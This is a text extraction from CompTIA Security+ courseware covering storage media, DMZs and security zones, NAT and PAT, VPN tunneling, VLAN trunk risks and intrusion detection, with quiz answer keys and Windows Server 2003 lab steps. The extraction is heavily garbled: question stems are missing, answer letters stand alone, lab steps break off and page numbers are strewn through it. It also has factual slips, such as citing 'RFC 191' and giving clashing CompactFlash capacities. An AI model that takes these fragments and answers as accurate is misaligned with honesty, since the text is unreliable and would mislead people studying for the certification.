Exhibit 10-9: Solid-state storage media External flash memory readers can access a flash memory card just as if it were an additional hard drive on a computer. Because the computer considers the files on the memory card already on the computer, using these files is just like using any other file on the computer. Removable solid-state storage media can be used with devices, or drives, that are either internal or external. These devices communicate with the computer through interfaces in the form of cables and connectors that connect the device to the CPU or the motherboard. Because there are no moving parts to break, solid-state media is more reliable and durable than conventional hard disk drives. It requires no battery to retain its data. Many other devices such as wireless phones and personal digital assistants (PDAs) also use solid-state media for storage. There currently are several popular types of solid-state media, including CompactFlash, SmartMedia, memory sticks, and secure digital/multimedia cards. CompactFlash The CompactFlash card is a very small type of storage, measuring only 1.7 inches by 1.4 inches, and less than a 1/4 of an inch thick. It weighs a mere half-ounce. Even with this small size, a CompactFlash card currently can store up to 4 GB of data. Many digital devices cannot handle this large storage size, so a more common storage capacity is between 8 and 128 MB. SmartMedia The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter. Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and newer printing devices. These cards can store only up to 64 MB of data, unlike CompactFlash cards, which can store up to 1 GB. However, SmartMedia cards are less expensive than CompactFlash cards. Like the CompactFlash cards, SmartMedia cards have a high data transfer rate and are resistant to extreme weather conditions.
1017
Another popular type of removable data storage is the Memory Stick. About the size of a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks are commonly used with digital still cameras, digital music players (MP3), digital voice recorders, and other digital devices. It has some of the same features as the CompactFlash card and the SmartMedia card, including a high data transfer rate, resistance to extreme temperatures, and high storage capacity. Secure digital/multimedia cards Secure digital/multimedia cards are primarily used in MP3 players and digital cameras. These SD/MMC memory cards are about the same size as SmartMedia cards, but thicker and have their own controller like CompactFlash cards. These cards can store up to 8 GB.
Catastrophic loss
When dealing with the various types of storage media, it is important to try to mitigate the risk of a catastrophic loss of data. The simplest way to do this is to make backup copies of any sensitive information and store the copies in a safe place. Information that is so vital that business operation could be threatened if lost should be stored at a separate, secure location preferably in a fire safe. It is also very important to use a type of media that is less likely to be corrupted or damaged, with solid-state media being the best choice in this instance. Magnetic media is very easily damaged or erased, and optical media is easily scratched and made unreadable.
Encryption
To guarantee that sensitive information does not fall into the wrong hands, any organization should implement a thorough encryption policy. At no time should business-critical information be stored in an unencrypted fashion. All of the media discussed above are compatible with encryption technologies. The key to a successful encryption policy is to educate the entire organization as to the importance of safeguarding sensitive data. If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised.
B-1:
B C D
2 A(n) ___________ detects the changing pattern of reflected light from the bumps in the aluminum coating on a CD. A
B
C D
1019
Topic B
Review questions
1 Describe coaxial cable construction.
It is composed of a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield.
5 Cat 5 twisted pair cables support 1000 Mbps Ethernet. True or False?
False. Cat 5 supports 100 Mbps. Cat 6 supports 1000 Mbps.
6 Fiber optic cable is more susceptible to damage than coax or twisted pair cable. True or False?
True
8 List potential damage that can be caused by altering data flows on the network.
Data corruption, sabotage of core business plans, impersonation of corporate nodes to gain network access.
12 List examples of storage media that use light and reflection to transmit data.
CD-ROM, CD-R, CD-RW, and DVD.
14 If one person takes a floppy disk off-site with unencrypted data, the entire company has been compromised. True or False?
True
1021
111
private network.
D Describe VLANs and explain their
112
Security zones
Any network that is connected (directly or indirectly) to your organization, but is not controlled by your organization, represents a risk. To alleviate these risks, security professionals create security zones, which divide the network into areas of similar levels of security (trusted, semi-trusted, and untrusted). You create the security zones by putting all your publicly accessed servers in one zone and restricted-access servers in another, then separating both from an external network like the Internet using firewalls. The three main zones into which networks are commonly divided are the intranet, perimeter network, and extranet.
Intranet
The intranet is the organizations private network; this network is fully controlled by the company and is trusted. The intranet typically contains confidential or proprietary information relevant to the company and, consequently, restricts access to internal employees only. The private internal LAN(s) are protected from other security zones by one or more firewalls, which restrict incoming traffic from both the public and DMZ zones.
113
As an additional safeguard to prevent intrusion, intranets use private address spaces. These IP addresses are reserved for private use by any internal network and are not routable on the Internet. The following address ranges are reserved: Class A 10.0.0.0 10.255.255.255 Class B Class C 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255
Additional security measures include: Installing anti-virus software Removing unnecessary services from mission-critical servers Auditing the critical systems configurations and resources
DMZ
Demilitarized zones are semi-trusted networks that are owned and controlled by the company, but have a lower level of security than the intranet. (The term comes from the geographic buffer zone that was set up between North Korea and South Korea following the UN police action in the early 1950s.) DMZs are commonly used by companies that want to host their own Internet services, while preventing access to their internal networks. The DMZ is typically a network segment consisting of a combination of firewalls, bastion hosts, and devices accessible to Internet traffic, such as proxy servers, Web (HTTP) servers, FTP servers, SMTP (e-mail) servers, and DNS servers. This zone also serves as a buffer zone between the Internet and intranet. Exhibit 11-1 and Exhibit 11-2 show two sample configurations for the perimeter network. In Exhibit 11-1, the DMZ zone is isolated by two firewalls, one leading to the Internet, the other to the intranet. This configuration protects the Web server with a firewall that allows access to the HTTP for Web services, but restricts all other protocols. A separate firewall is used to isolate the intranet from all Internet traffic. This implementation of the DMZ is called a screened subnet.
Not all organizations require a DMZ, so explain to students that a DMZ is necessary only if a company wishes to host its own public resources such as Web servers and DNS servers. Many organizations host their Web server and other public servers with a third party, thereby avoiding the necessity of a DMZ.
114
CompTIA Security+ Certification In Exhibit 11-2, a single firewall with three network interfaces (three-NIC firewall) provides the separation of the intranet, the DMZ and the external network. A single device protects both the perimeter network and the intranet. This network configuration is not as secure as the Exhibit 11-1: a failure or compromise of the three-NIC firewall can result in the compromise of the perimeter network and intranet simultaneously.
Exhibit 11-2: Security zones created by three-NIC firewall Internet users can access only the hosts on the DMZ. In the event that an outside user penetrates the DMZ hosts security, Web pages or FTP files might be corrupted, but no other company information would be exposed. Filter outgoing traffic Filtering traffic originating from a DMZ impairs an attackers ability to have a vulnerable host communicate to the attackers host. An attacker often has the vulnerable DMZ host initiate commands that open an outgoing connection from the DMZ to the attackers host to receive more commands to run. Blocking this initial outbound connection makes life harder for the attacker. Applying filtering to traffic leaving the DMZ can also keep a compromised host from being used as a traffic-generating agent in distributed denial-of-service attacks. Assuming you know that DMZ hosts should not be initiating outbound traffic, you can trigger an intrusion detection alarm to notify you whenever the rule is engaged. Likewise, because you know what traffic should originate on your hosts, you can construct filters that notify you when someone tries to initiate traffic outside of what is expected. This is a key principal in constructing intrusion detection alarms and can be a highly effective method of notifying you when your host has been compromised. The most basic method of limiting outbound traffic is to construct a firewall rule or router filter that specifically drops traffic initiated from devices on the DMZ network interface to the Internet.
115
Another good candidate for filtering is the traffic coming in from the DMZ interface of the firewall or router that appears to have a source IP address on a network other than the DMZ network number. This traffic generally represents spoofed traffic that is often associated with denial-of-service attacks. When dropping these types of security-related traffic, the firewall or router should be configured to initiate a log message or rule alert so that a notification of a potential system compromise can be sent to an appropriate administrator. A solid understanding of what kind of network traffic is expected to be generated is essential for this kind of configuration to work. The key is to limit traffic to only authorized access. Remember that several common protocols, such as FTP and DNS, initiate outbound connections. Special consideration should be given to these kinds of protocols. Applying these recommendations can make an attackers job much more difficult and provide an administrator early notification when a host has been compromised.
Extranet
The extranet is an extension of your private network or intranet. It allows you to share your business information or operations with another business, such as a supplier, vendor, partner, or customer. This is often referred to as business-to-business (B2B) communications or networks because one company uses the internal resources and services of another. An extranet requires security and privacy. These are accomplished through firewall management, the issuance and use of digital certificates or similar means of user authentication, encryption of messages, and the use of VPNs that tunnel through the public network. Companies can use an extranet to: Exchange large volumes of data using Electronic Data Interchange (EDI). Share product catalogs exclusively with wholesalers or those in the trade. Collaborate with other companies on joint development efforts. Jointly develop and use training programs with other companies. Provide or access services provided by one company to a group of other companies, such as an online banking application managed by one company on behalf of affiliated banks. Share news of common interest exclusively with partner companies.
116
Do it!
A-1:
2 A demilitarized zone (DMZ) is used by a company that wants to host its own Internet services while preventing access to its private network. True or false?
True
3 The DMZ is the most insecure area of your network infrastructure. What hardware is reserved for this area? (Choose all that apply.)
A B C D
Print servers Firewalls Public Internet servers, such as HTTP, FTP, and Gopher servers Mail servers
Filter traffic originating from a DMZ. Construct filters that notify you when someone tries to initiate traffic outside of what is
expected. Internet.
Specifically drop traffic initiated from devices on the DMZ network interface to the Filter the traffic coming in from the DMZ interface of the firewall or router that appears to
have a source IP address of a network other than the DMZ network number.
117
NAT
Explanation Network Address Translation (NAT) is a service that allows the conversion of internal private (IP) addresses to Internet public addresses. They are not routable and are not directly accessible from the Internet. NAT was originally developed as an interim solution to tackle IPv4 address depletion by allowing globally registered IP addresses to be reused or shared by several hosts. The classic NAT defined by RFC 1631 maps IP addresses from one realm to another. A more recent definition of NAT is found in RFC 3022. NAT serves two main purposes: It provides a type of firewall by hiding internal IP addresses. It enables a company to use more internal IP addresses. Because theyre only used internally, theres no possibility of conflict with IP addresses used by other companies and organizations. Although it can be used to translate between any two address realms, NAT is most often used to map IPs from the private address spaces defined by RFC 191, as shown here:
Class A B C Private Address Range 10.0.0.0 10.255.255.255 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255
These addresses were reserved for use by private networks. Enterprises can freely use these addresses to avoid obtaining registered public addresses. Because private addresses can be reused by other organizations, they are not unique and are nonroutable over a common infrastructure. When communication between a privately addressed host and a public network (such as the Internet) is needed, address translation is required. This is where NAT comes in. NAT routers sit on the border between private and public networks, converting private addresses in each IP packet into legally registered public ones. They also provide transparent packet forwarding between addressing realms. The packet sender and receiver (should) remain unaware that NAT is taking place. Today, NAT is commonly supported by WAN access routers and firewalls situated at the network edge.
118
Static NAT
NAT works by creating bindings between addresses. In the simplest case, a one-to-one mapping might be defined between public and private addresses. Known as static NAT, this can be accomplished by a straightforward, stateless implementation that transforms only the network part of the address, leaving the host part intact. The payload of the packet must also be considered during the translation process. The IP checksum must, of course, be recalculated. Because TCP checksums are computed from a pseudo-header containing source and destination IP address (attached to the TCP payload), NAT must also regenerate the TCP checksum.
Dynamic NAT
More often, a pool of public IP addresses is shared by an entire private IP subnet in a form of NAT called dynamic NAT. Edge devices that run dynamic NAT create bindings on the fly by building a NAT table. Connections initiated by private hosts are assigned a public address from a pool. As long as the private host has an outgoing connection, it can be reached by incoming packets sent to this public address. After the connection is terminated (or a timeout is reached), the binding expires, and the address is returned to the pool for reuse. Dynamic NAT is more complex because state must be maintained, and connections must be rejected when the pool is exhausted. However, unlike static NAT, dynamic NAT enables address reuse, reducing the demand for legally registered public addresses. The potential problem with dynamic NAT (or static NAT for that matter) is that it has fewer public addresses than inside hosts. If you have 254 public addresses, for example (a class C network), you might assign 3 or 4 of those to static devices, like Web servers and DNS servers. That leaves 250 addresses for dynamic NAT. But what if your organization has 500 hosts? If more than 250 want to use the Internet at the same time, you will run out of public addresses. The solution? PAT.
Since a port number is 16 bits long, this has the potential for a single IP address to serve as many as 65,536 different hosts.
119
In some cases, static NAT, dynamic NAT, PAT, and even bi-directional NAT or PAT might be used together. For example, an enterprise might locate public Web servers outside of the firewall on a DMZ, while placing a mail server and clients on the private inside network, behind a NAT firewall. Furthermore, suppose there are applications within the private network that periodically connect to the Internet for long periods. In this case: Web servers can be reached from the Internet without NAT, because they live in public address space. Simple Mail Transfer Protocol (SMTP) sent to the private mail server from the Internet requires incoming translation. Because this server must be continuously accessible through a public address associated with its Domain Name System (DNS) entry, the mail server requires static mapping (either a limited-purpose virtual server table or static NAT). For most clients, public address sharing is usually practical through dynamically acquired addresses (either dynamic NAT with a correctly sized address pool, or PAT). Applications that hold onto dynamically acquired addresses for long periods could exhaust a dynamic NAT address pool and block access by other clients. To prevent this, long-running applications might use PAT because it enables higher concurrency (thousands of port mappings per IP address).
B-1:
Provides a type of firewall by hiding internal IP addresses. Enables a company to use more internal IP addresses. Because theyre used internally only, theres no possibility of conflict with IP addresses used by other companies and organizations. Allows a company to combine multiple ISDN connections into a single Internet connection. All of the above.
C D
A B C D
B C D
A B C D
4 Which of the following protocols map private IP addresses to registered IP addresses on a one-to-one basis? A
B
C D
10.0.0.0 through 10.255.255.255 172.16.0.0 through 172.31.255.255 192.168.0.0 through 192.168.255.255 All of the above
1111
B-2:
Heres how
For this activity, each student requires a partner. Each pair requires two Windows Server 2003 servers, a Windows Server 2003 server CD, Internet access, and a crossover cable. Important: Students should not connect the crossover cable until instructed to do so.
Choose Open 3 Right-click the second network interface Choose Properties 4 Double-click Internet
Protocol (TCP/IP) This card is not connected to the classroom network.
selected Click OK Click OK 6 Right-click the second network interface Choose Rename 7 Enter Internal as the name Press e
In Network Connections.
Select the External interface in the list of available interfaces 15 Click Next 16 Click Finish 17 Expand Server-X 18 Expand IP Routing 19 Select General 20 Right-click the Internal interface Choose Properties 21 Activate the Configuration tab 22 Select Use the following IP
address
To start the Routing and Remote Access. If necessary (In Routing and Remote Access). If necessary.
To set static IP addressing on the Internal interface. As the IP address. As the Subnet mask.
Network security topologies 23 Click OK 24 Click OK 25 Close and reopen Routing and
Remote Access To save the changes. To acknowledge the warning message.
1113
(To reopen the MMC console. Click Start, then choose Administrative Tools, Routing and Remote Access.) Under IP Routing. If there are multiple instances of Internal, for this step it doesnt matter which instance you choose.
Click OK 29 Right-click the External interface Choose Properties 30 Verify that Public interface
connected to the Internet
Do it!
B-3:
Heres how
a Windows Server 2003 server running RRAS with NAT, a second Windows Server 2003 server to act as a client, Internet access on Server-X, and a crossover cable. Assist students with connecting the crossover cable.
1 On Server-Y, disconnect the cable to the classroom network 2 Connect a crossover cable from Server-Y to Server-X 3 Log on to Server-Y as
Administrator
Choose Open 5 Right-click the network interface Choose Properties 6 Double-click Internet
Protocol (TCP/IP)
As the IP address. (Do not press Enter.) To set the Subnet mask. (As the default gateway.) This is the Internal address for Server-X. As the Preferred DNS server.
Network security topologies 10 Open Internet Explorer 11 Navigate to your favorite Web site 12 Close Internet Explorer
To access the Internet.
1115
Do it!
B-4:
Heres how
have a Windows Server 2003 server running RRAS and NAT and a second Windows Server 2003 server to act as a client.
Students should
2 Expand IP Routing Select General 3 Right-click the External interface Choose Properties 4 Click Outbound Filters Click New
If necessary.
To open the External Properties dialog box. The General tab is activated by default. To open the Outbound Filters dialog box. To open the Add IP Filter dialog box.
1117
6 Click OK
To return to the Outbound Filters dialog box. The settings you just entered instruct the router to block all Internet access using the HTTP protocol.
selected Click OK twice 8 On Server-Y, launch Internet Explorer and try to access your favorite Web site 9 Close Internet Explorer
Internet Explorer will try to load the page. After a few minutes, youll receive the error message: The page cannot be displayed.
Do it!
B-5:
Heres how
1 On Server-X, right-click the Internal interface Choose Properties 2 Click Inbound Filters Click New 3 Enter the information shown below
To block local FTP traffic while still allowing Internet ftp access.
Network security topologies 6 On Server-Y, click Start Choose Run Enter cmd 7 At the command line, enter ftp
10.10.10.1
1119
To connect to Server-X via ftp. Youll be notified that you are connected to Server-X, but the connection will time out, and youll receive the message: Connection closed by remote host.
9 Press c + C, then enter quit 10 On Server-X, right-click External interface Choose Properties 11 Click Outbound Filters 12 Click Delete Click OK Click OK 13 Right-click Internal interface Choose Properties 14 Click Inbound Filters 15 Click Delete Click OK Click OK
To close the Output Filters window. To close the External Properties window. To start the process of removing the NAT inbound filters.
To close the Input Filters window. To close the Internal Properties window.
Click Yes 17 Remove the crossover cable from Server-Y 18 Reconnect the network cable for Server-Y to the classroom network 19 On Server-Y, access the properties of the network interface Select Obtain an IP address
automatically
1121
Topic C: Tunneling
This topic covers the following CompTIA Security+ exam objective:
# 3.3 Objective Understand the concepts behind the following kinds of Security Topologies Tunneling
Exhibit 11-3: Tunneling across a shared infrastructure To solve the problem, a router with Internet Protocol Security (IPSec) encryption capabilities is deployed as a gateway on each LANs Internet connection. The routers are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual connection between the two routers. When a router sees traffic on its LAN that is destined for the other office, it communicates over the Internet to the router on the other side instructing it to build the tunnel. The tunnel is actually an agreement between the two routers on how the data is encrypted. Once the two routers have negotiated a secure encrypted connection, traffic from the originating host is encrypted using the agreed-upon settings and sent to the peer router. The peer router decrypts the data and forwards it to the appropriate host on its LAN. The connection appears to be a tunnel, because the hosts on the two LANs are unaware that their data is being encrypted. The encryption and delivery of the data over the untrusted network happens transparently to the communicating hosts. Because of their low cost (VPN tunnels often use existing Internet connections) and security, tunneling has become common, replacing wide area network (WAN) links such as frame relay connections. Tunneling is an option for most IP connectivity requirements.
C-1:
B
C
2 For each of the descriptions below, indicate whether the VPN is a remote access or site-to-site topology. Creates a secured connection between a remote client and an access point or the corporate network Establishes a point-to-point connection Requires an ISP to establish the tunnel Uses tunnel mode encryption Decrypts the entire IP packet before forwarding to the destination host
Remote access
1123
VLANs
Explanation Virtual local area networks (VLANs) are a way of dividing a single physical network switch among multiple network segments or broadcast domains. This ability to configure multiple VLANs on a single switch is a very powerful and useful technology that offers network flexibility, scalability, increased performance, and some security features. VLANs are often coupled with a complimentary technology, called a trunk, which allows switches to share many VLANs over a single physical link. And because VLANs make it easy to segment a network into multiple subnets (which cannot communicate with each other), they increase the need for routers (which enable communications between subnets), and have a number of important security features, such as packet-filtering capabilities. Because of their benefits, VLANs (and by association, trunking) have become extremely widespread. Most enterprise-grade network switches come standard with the ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities, which can be mitigated by following best practices in network design.
How it works
As an example of how VLANs work, well use a Cisco Catalyst 6509 switch belonging to a business with five departments and 220 employees. This type of switch is an enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight of its nine slots. Thats a total of 384 Ethernet ports on a single switch! By configuring several VLANs on the switch, and assigning each port to an appropriate VLAN, the single physical switch is broken up into multiple logical switches. The business in our example can configure a separate VLAN for each department. It doesnt matter to which port a given users computer is connected because the switch can be configured to place the port into any VLAN.
Exhibit 11-4: Physical VLAN configuration on Cisco Catalyst 6509 Because the connection between each switch is a trunk, packets from any VLAN can pass across it. (The normal VLAN boundaries apply, however. Hosts on different VLANs cannot communicate with each other over trunks.) This enables hosts connected to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are also connected to VLAN 20. Without trunking, a separate physical connection for each VLAN would have to be established between each switch and switch E. The switchs built-in intelligence watches packets arriving on a trunk port, automatically determines to which VLAN it belongs, and forwards it to the appropriate port. The result is that the network administrator can place any host in the building on any of his or her networks subnets, on the fly, without any physical recabling. Major trunking protocols include IEEE 802.1q and Ciscos proprietary Inter-Switch Link (ISL).
1125
1127
One way that trunks can be abused stems from the fact that the default behavior of some manufacturers switches is to automatically negotiate a trunk connection if the connecting device initiates it. Hackers can exploit this behavior by compromising a host on the network and then causing that host to negotiate a trunk connection with the switch. Once the trunk connection has been established, the switch forwards traffic for all VLANs across the link, giving the attacker access to potentially the entire network. Recall our example in which the Accounting and Marketing Departments are placed on separate VLANs and are connected with a router that filters traffic between the two. The attacker could use a host in the Marketing Department to create a trunk with the switch. As the switch begins to forward traffic down the illicit trunk link, the attacker can view and possibly modify traffic from Marketing, Accounting, or any other department using the switch. The protection provided by packet filtering on the router has been completely avoided because the trunk traffic does not pass through the router. Prevent illicit trunk connections by disabling auto-negotiation on all ports. Ports that are to carry trunks should be configured as trunks. All other ports should be configured not to be trunks. Trunk VLAN membership and pruning By default, trunk links are permitted to carry traffic from all VLANs on the network. This can lead to performance degradation of switches from carrying large amounts of traffic across trunks. In some cases, this traffic might not even be needed, as would be the case if a switch received traffic for the Accounting VLAN over a trunk but did not have any ports configured for that VLAN. This situation can be relieved by pruning (that is, removing) unneeded VLANs from the trunk. By removing the Accounting VLAN from the trunk, more bandwidth is made available to users connected to the switch. Some switches simplify this process by automatically pruning VLANs from a trunk if there are not any VLAN member ports on the other side of the trunk link. Relying on this default behavior to ensure that sensitive information is not carried to undesired areas of the network can be dangerous, however. For example, take a switch in a companys mechanic shop that is only used for the shop employees and has a trunk connection back to the office network. By default, only traffic destined for the auto shop is forwarded across the trunk, because there are no ports on the shops switch that are configured for other VLANs. However, the Accounting Departments information is still at risk. If an attacker could configure a port on the shops switch to be in the Accounting VLAN, then the Accounting VLAN would no longer be pruned from the trunk, and Accounting traffic would automatically be forwarded across the trunk to the mechanic shop. An attacker could take advantage of a poorly monitored area to physically compromise the network. In order to prevent such attacks, it is recommended that all trunk links be manually configured with the VLANs that are permitted to traverse them. Manual trunk pruning cannot be overridden the same way that automatic pruning is preempted. For more information on VLANs, go to:
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lansw tch.htm.
D-1:
IEEE 802.1q IEEE 802.3 Ciscos proprietary Inter-Switch Link (ISL) IEEE 802.10
B
C
2 VLANs are often coupled with a complimentary technology, called _________, which allows switches to share many VLANs over a single physical link. A B
C
3 When referring to VLANs, pruning refers to removing unneeded VLANs from the trunk. True or false?
True
4 VLANs are used throughout networks to segment, or separate, different hosts from each other on the network. True or false?
True
1129
Topic B
Topic C Topic D
Review questions
1 Which security zone should contain your Web, FTP, and mail servers? A Intranet
B
DMZ
C Extranet D VPN 2 Which security zone describes a configuration where the internal network of one company is available to another for B2B transactions?
Extranet
3 Which network service(s) allows internal addresses to be hidden from outside networks?
A B
NAT DMZ
C VLAN D VPN 4 PAT allows many hosts to share a single IP address by combining the IP address with a unique ________________.
TCP/UDP port number
Tunneling
C Extranet D Perimeter network 6 Which of the following ports are necessary for allowing DNS traffic?
A
TCP 53
B TCP 80
C
UDP 53
D UDP 80 7 What are the benefits of a VLAN? A It hides the internal IP address from external networks.
B
C It provides a secure tunnel from between two extranets. D It filters incoming traffic for selected IP and port addresses. 8 What are vulnerabilities of the VLAN?
A
A compromised host can negotiate a trunk connection with the switch, giving the attacker access to the entire network.
B A hosts broadcasts can be seen by other network segments. C A sniffer can be physically inserted into a specific targeted network segment.
D
Automatic pruning permits an attacker to reconfigure a switchs port to forward traffic to a different segment.
121
122
Intrusion detection
123
Because the IDS can be either correct or incorrect in their determination about the type of activity, there are four possibilities to describe the correctness of IDS determinations: True positives Occur when the IDS correctly identifies undesirable traffic. True negatives Occur when the IDS correctly identifies normal traffic. False positives Occur when the IDS incorrectly identifies normal traffic as an attack. False negatives Occur when the IDS incorrectly identifies an attack as normal traffic. False negatives False negatives imply that the IDS failed to detect an attack, a very undesirable situation. False negatives typically occur when the pattern of traffic is not identified in the signature database, such as with a new attack. False negatives can also occur with network-based IDS when the sensor is not able to analyze passing traffic fast enough. For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec worth of traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets when the volume of traffic on the segment surpasses its 40 Mb/sec capability. IDS is not infallible, and false negatives do indeed occur on a regular basis. The problem of false negatives can be dealt with in two ways. First, a combination of network-based and host-based IDS can be used to obtain more even coverage. The combination also helps to gather more data on attacks that can help administrators analyze the attack more effectively. Second, NIDS can be deployed at multiple strategic locations in the network. That way, an attack missed by one NIDS, on the server farms network segment, for example, might be caught by the NIDS just inside the firewall. False positives False positives happen when the IDS mistakenly reports certain benign activity as malicious. Best-case false positives require human intervention to diagnose the event. Worst-case false positives can cause the legitimate traffic to be blocked by a router or firewall. Obviously, false positives are undesirable because they require the time of a security administratoran expensive commodityto analyze and sort out the problem. All IDS products on the market today are subject to false positives. Especially just after deployment, IDS can be expected to produce a relatively high volume of false positives, which are reduced over time using a process called tuning. The tuning process allows the administrator to instruct sensors not to alarm, based on parameters such as signature type, and source or destination IP address. One common example is a network management program that pings devices to ensure that they are functioning. This behavior resembles a reconnaissance technique called a ping sweep, which attackers can use to determine which IP addresses are up and available to attack. It also triggers an alarm from an NIDS. Although ping sweeps can indicate malicious activity, the alarm is a false positive when the ping sweep is conducted by an authorized host, the network management system. To prevent the NIDS sensor from alarming on a false positive, it can be configured not to alarm on ping sweeps from the network management systems IP address. Tuning is an essential step in any IDS deployment.
124
Do it!
A-1:
Detecting intrusion
2 Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. True or false?
True
3 Intrusion detection systems identify attacks by comparing traffic to signature files with known types of attack and detecting anomalies. True or false?
True
4 False negatives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
False. These are false positives.
Combine network-based and host-based IDS. Tune the IDS to accept specific signature types or source or destination IP addresses. Deploy NIDS at multiple strategic locations in the network. Reduce the traffic speed.
B
C
Intrusion detection
125
Types of IDS
Explanation The two types of intrusion detection systems on the market today are host-based and network-based. The essential difference between them is the scope of activity that they monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
Network-based IDS
NIDS sensors are dedicated network devices or servers that monitor traffic on one or more network segments. The sensors usually have two network connections, one that operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is used to send data such as alerts to a centralized management system. The configuration is shown in Exhibit 12-1.
Exhibit 12-1: NIDS monitoring and management interfaces Because NIDS analyze all passing traffic, they can be used to protect an entire network segmentor the entire organizationdepending on their placement within the network. The primary constraint for NIDS is the occasional inability to keep up with the pace of network traffic.
126
CompTIA Security+ Certification NIDS architecture One of the key questions that arise in deploying NIDS is, where in the network do sensors belong? Because it is not cost-effective or even manageable to deploy sensors on all network segments, careful consideration needs to be given as to where they are deployed. To determine how to deploy IDS, one needs only answer the question: What do I most need to protect? The decision of where to deploy IDS should be driven by the value your organization places on its information assets. This is because NIDS sensors are placed strategically in the network to defend assets that are considered the most valuable where they will offer the most protection. Typical locations for IDS sensors include: Just inside the firewall On the DMZ On any subnets containing mission-critical servers Just inside the firewall is a common location for IDS because it is the bottleneck through which all inbound and outbound traffic must pass. In this location, sensors are able to inspect every packet coming into or out of the organizations network, provided there are no other avenues such as dial-up connections or extranet connections that the attacker can use. The DMZ is another good location for IDS, because the publicly reachable hosts located there are frequently attacked from the Internet. If a good security policy is implemented (which likely disallows connectivity from the Internet directly to the inside network), then the DMZ is the attackers first point of entry into the network. Once a DMZ host has been compromised, the attacker attempts to penetrate the trusted network. IDS in this location can help to identify and stop intruders before they are able to do so. Finally, consider placing the sensor on any subnets containing mission-critical application servers, such as those performing financial, logistical, and human resources functions. By placing the sensor on these segments, the organization can defend its servers from attacks originating from inside the network. NIDS signature types Signature-based IDS look for patterns in packet payloads that indicate a possible attack. When the sensor finds a packet payload that matches the string pattern in its sensor, it identifies the packet as an attack and alerts the administrator. An IDS based on another signature type, port signature, simply watches for connection attempts to a known or frequently attacked port. These could be ports used by Trojan horse programs, or other malware, or they could simply be well-known ports in a packet destined for part of the network where the corresponding service should not exist. For example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined for the DMZ could be marked as suspicious. Finally, IDS based on header signatures watch for dangerous or illogical combinations in packet headers. One well-known example is a packet generated by the attack tool WinNuke. WinNuke creates packets destined for a NetBIOS port, with the Urgent pointer, or Out Of Band pointer set. This packet crashes older Windows systems. A NIDS based on header signatures identifies this type of packet as an attack, because the attack is contained in the packets header and not in the payload.
Intrusion detection
127
Because new vulnerabilities are constantly identified by the security community, signature-based intrusion detection systems must be kept up to date with the latest signatures, much the same way virus definitions in virus scanning software need to be kept current with the latest developments in the security arena. The time between when the new attack first becomes available and when it becomes known to the security community (which then produces a signature for the attack) represents a vulnerability of signature-based IDS, because attackers are free to use the new exploit without fear of detection during that time period. IDS vendors do commonly provide signature update services, and e-mail customers when new signatures become available. To minimize vulnerability, it is critical that IDS be loaded with the latest signatures. Network IDS reactions As has been previously noted, network-based IDS with active monitoring capabilities are able to react when they detect an attack in progress. Typical reaction types include: TCP resets IP session logging Shunning or blocking Most active capabilities are configurable on a per-signature basis, meaning that the sensor can perform IP session logging for some attacks, blocking for others, or simply sound the alarm, depending on the organizations requirements. Note: Extreme care should be used with active sensor capabilities to prevent interference with legitimate traffic. In practice, active capabilities are infrequently implemented because of the risk that they could be used to deny service of legitimate user traffic. When these capabilities are deployed, it is done after the sensors have been carefully tuned and requires ongoing monitoring. TCP resets TCP resets operate by sending a TCP reset packet (which terminates TCP sessions) to the victim host, spoofing the IP addresses of the attacker. Resets are sent from the sensors monitoring or sniffing interface. Although TCP resets can terminate an attack in progress, they cannot stop the initial packet from reaching the victim. In some cases, a single packet is all that is required to crash or compromise the victim host. Further, in order to successfully spoof the identity of the attacking host (remember that the victim does not know that it is under attack and sees the TCP session as being like any other session that should be protected from session hijacking), the sensor must guess the correct TCP session number so that the victim will accept the reset and end the session. IP session logging With IP session logging, the sensor records traffic passing between the attacker and the victim. (Note that these records can be very useful for analyzing the attack and preventing it in the future.) The limitation of logging is that only the trigger and the subsequent packets are logged, so any preceding packets are lost. IP session logging can also impact sensor performance and quickly consume large amounts of disk space.
128
CompTIA Security+ Certification Shunning In shunning (also known as IDS blocking), the sensor connects to the firewall or a packet-filtering router from its management interface and configures filtering rules that block packets from the attacker. Proper authentication needs to be arranged to ensure that the sensor can securely log into the firewall or router. Shunning is usually a temporary measure (the rules are typically left in for a period of minutes or hours) that buy administrators time to respond. Shunning is not typically a permanent countermeasure. It is important to keep in mind that if the attacker has used a spoofed source address in his attack, then the IDS sensor will actually block someone other than the attacker (the legitimate owner of the spoofed IP address). Note: Shunning takes place after a triggering packet has been noted by the sensor. When it reaches the victim host, it can potentially inflict damage before the filtering rule is in place.
Do it!
B-1:
2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP reset packet to the victim host. True or false?
True
3 With IP session logging, the sensor records traffic passing between the attacker and the victim. True or false?
True
4 The DMZ is a good location for IDS because the publicly reachable hosts located there will be under constant attack from the Internet. True or false?
True
5 In shunning, the sensor connects to the firewall or a packet-filtering router from what interface?
A
B C D
6 A NIDS that watches for connection attempts to a known or frequently attacked port uses _____________ detection.
port signature
Intrusion detection
129
Host-based IDS
